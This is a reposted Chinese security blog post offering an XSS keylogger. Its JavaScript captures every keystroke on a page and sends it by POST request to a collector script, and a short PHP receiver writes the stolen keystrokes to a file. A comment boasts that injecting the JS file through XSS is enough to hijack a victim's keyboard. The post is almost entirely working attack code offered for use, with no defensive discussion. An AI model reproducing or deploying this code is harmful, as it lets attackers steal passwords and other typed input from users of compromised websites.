function createAjax(){ var request=false; //window对象中有XMLHttpRequest存在就是非IE,包括(IE7,IE8) if(window.XMLHttpRequest){ request=new XMLHttpRequest(); if(request.overrideMimeType){ request.overrideMimeType("text/xml"); } //window对象中有ActiveXObject属性存在就是IE }else if(window.ActiveXObject){ var versions=['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i<versions.length; i++){ try{ request=new ActiveXObject(versions[i]); if(request){ return request; } }catch(e){ request=false; } } } return request; }//注意: 要每次请求都要使用一个新的XMLHttpRequest/* 如果使用get将数据传给服务器,则服务器就使用$_GET 就直接通过Url将数据传给服务器 使用POST时一定要使用 ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); */var ajax=null;var xl="username=";function onkeypress() { var realkey = String.fromCharCode(event.keyCode); xl+=realkey; show(); } document.onkeypress = onkeypress;function show(){ ajax=createAjax(); ajax.onreadystatechange=function(){ if(ajax.readyState==4){ if(ajax.status==200){ var data=ajax.responseText; //alert(data); }else{ alert("页面请求失败"); } } } //document.onkeypress = onkeypress; var postdate = xl; ajax.open("POST", "http://127.0.0.1/yans/post.php", true); ajax.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); ajax.setRequestHeader("Content-length", postdate.length); ajax.setRequestHeader("Connection", "close"); ajax.send(postdate); //ajax.send(null); //by darkmoon link:90sec.org blog:blog.moonhack.com}
只要调用一下js文件xss劫持键盘就能够实现!!!!!!!<?php//if($_POST['bbb']){$a=$_POST['username'];$handle=fopen('fuck.txt',"w");fwrite($handle,$a."\r\n");//}?>
posted on 2016-11-12 22:28 websec80 阅读( ...) 评论( ...) 编辑 收藏
转载于:https://www.cnblogs.com/websec80/articles/6057755.html
相关资源:js实现键盘操作实现div的移动或改变的原理及代码